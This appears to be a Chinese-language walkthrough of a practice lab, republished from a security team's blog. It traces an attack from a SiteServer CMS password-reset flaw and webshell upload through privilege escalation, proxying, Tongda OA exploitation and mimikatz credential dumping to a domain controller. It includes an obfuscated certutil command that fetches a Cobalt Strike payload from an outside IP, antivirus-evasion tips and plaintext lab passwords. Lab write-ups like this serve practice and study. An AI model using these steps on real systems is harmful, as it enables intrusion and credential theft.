Redian新闻
>
从web端getshell到内网域控

从web端getshell到内网域控

科技

先说结论

这套环境刚开始大体看了下以为比较有难度,没想到拿下域内OA办公机时直接把域管密码dump下来了,感觉属实草率了。。。不过整体来说还是可以的,对于在实战中遇到域控不多的铁子可以拿来练练手熟悉环境,最后感谢作者提供的靶场环境,大佬辛苦了!

信息收集

已知靶标URL为http://www.moonlab.com/
(搭建环境访问时需要绑定hosts),直接访问域名没啥东西



查看robots.txt

siteserver管理员密码找回

siteserver之前爆出过管理员密码找回功能存在缺陷,详情见此
使用密码找回功能
http://www.moonlab.com/siteserver/forgetPassword.aspx



火狐禁用JS,Firefox地址栏
about:config
搜索框中输入JavaScript,找到javascript.enabled将其转换为false



回到找回密码页面,一直点下一步


后台getshell

siteserver后台getshell方法很多,详情
这里使用模板文件上传拿shell。
在’系统管理’–’站点模版管理’–’导入站点模版’,



使用csroad大佬的webshell免杀生成器生成ashx CMD马,压缩为rar上传到目标模版里,然后访问即可获取webshell



tasklist可以看到有安全狗


上线cs,本机信息收集,搭代理

使用免杀语句将cs木马下载到靶机

c""""e""""r""""t""""u""""t""""i""""l.exe -urlcache -split -f http://23.234.209.205:8000/6666.exe 6666.exe



查看权限,梼杌插件JuicyPotato (ms16-075)提权至system



查看是否开启3389
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnectionsshell tasklist /svc | findstr "TermService"shell netstat -ano | findstr "992"



双网卡机器



读管理员密码 administrator !@#QWE123



上frp搭代理(已经读出管理员密码,确认开启3389,故忽略此步骤接下来直接在虚拟机内靶机上操作,否则太卡。。。)
shell frpc.exe -c socks5.ini

内网横向

fscan探测内网信息,发现1.130机器存在通达OA



直接梭哈拿shell



system权限带360、不出网,双网卡存在10.10.10.段,2012操作系统






正向连接上线CS,首先生成监听器beacon-tcp,监听在17775端口



然后CS生成一个stageless木马,选定刚才的新监听器


connect 10.10.1.130 17775



可以看到是域内机器,而且有域控进程




mimikatzs抓取logonpasswords
获取本机administrator密码!@#Q123,域内用户OA密码!@#Qz123,域控administrator密码tide123…







域控

定位域控IP10.10.10.165



nmap扫全端口,3389已开


直接远程桌面登录


flag.txt


E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。


微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
Web2游戏大佬纷纷「下凡」,谁能笑傲Web3江湖?我去了中国最大的 Web3 聚会,发现人们想要的不是 Web3鹧鸪天:湖静谧,鹤轻飞黑皮+白丝+埃及风!figma“漆黑的守护者”HEMET NETHEL你可以错过Web3,但不要错过Web5Web3是区块链的一段弯路吗?|PingWeb3专栏使用 External Secrets Operator 安全管理 Kubernetes SecretsHow Foreign Students Cheat China’s College Admissions SystemShellenberger:唯一有望击败纽森的加州州长候选人With Bittersweet Memories, Students Leave Shanghai in Droves西雅图周末不无聊|一整个夏天都有免费音乐会听啦!就在Bellevue Beats Summer Concerts!英伟达再发声明:高端GPU已获得美国出口授权!狂,人生难得几回狂Young Chinese Shunned Marriage. Now, They Want Singles’ Rights.从Web2弄潮至今,这位互联网先知再度抢占Web3高地这才刚开始学Web3,Web5就已经来了这些年摔过的跤。。。“周末”应该说at the weekend还是on the weekend?新财年10月排期表已出!EB-2和EB-3移民排期前进二个月左右, EB-5区域中心及EB-5直投项目移民排期倒退了275天Web3.0:一场“赛博资本主义”的谎言|PingWeb3专栏部分getshell漏洞汇总生活琐记:在友人家共贺温馨母亲节Shanghai Bets Big on Its Silicon ValleyStaff at Pet Shelter Bid Farewell To Four-legged FriendsReadLexington:The Last Rose of Shanghai by Weina Dai Randel潮影webshell在线免杀功能上线云九资本牛凤轩:资本视角下的Web3全家桶、以及Web3语境下的元宇宙|36氪专访从Web3「调头」Web2,FTX到底在图什么?记一奇葩弱口令到内网实战【6.19今日折扣】Amazon Fresh超值限时满减!Nintendo eshop游戏限时2折起!Wedgewood从弱口令到内网生产区Web3没玩明白,Web5来了?! Jack Dorsey发布新概念,马斯克第一个表示支持骗子终于对我下手了瀚博亮出7nm国产云端GPU:集渲染、AI、视频于一体Shanghai Reopening Diary: Why Don’t We Always Let the Weeds Grow
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。